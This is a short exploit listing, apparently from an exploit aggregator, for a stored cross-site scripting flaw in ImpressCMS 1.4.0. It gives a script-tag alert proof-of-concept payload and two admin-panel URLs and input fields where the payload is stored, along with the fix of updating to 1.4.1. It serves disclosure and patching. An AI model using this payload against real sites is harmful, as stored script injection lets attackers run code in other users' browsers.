Exploit for Impress CMS 1.4.0 Cross Site Scripting

Name: Exploit for Impress CMS 1.4.0 Cross Site Scripting
Rating: 5 (165 reviews)

2020-07-11 | CVSS -0.1

## https://sploitus.com/exploit?id=PACKETSTORM:158388
#Author: AppleBois  
#Homepage: https://sourceforge.net/projects/impresscms/  
#Affected Version: 1.4.0  
#Stored XSS  
#Allows an attacker to execute arbitrary HTML and JavaScript code  
#Solution: Update to 1.4.1   
#More information : https://github.com/ImpressCMS/impresscms/issues/659  
  
Payload = <script>alert('AppleBois');</script>  
  
Vulnerable URL :modules/system/admin.php?fct=adsense&op=mod&adsenseid=4  
Vulnerable TextBar : ID of the [adsense tag to display this ad]  
  
Vulnerable URL :/modules/system/admin.php?fct=customtag&op=mod  
Vulnerable TextBar : Name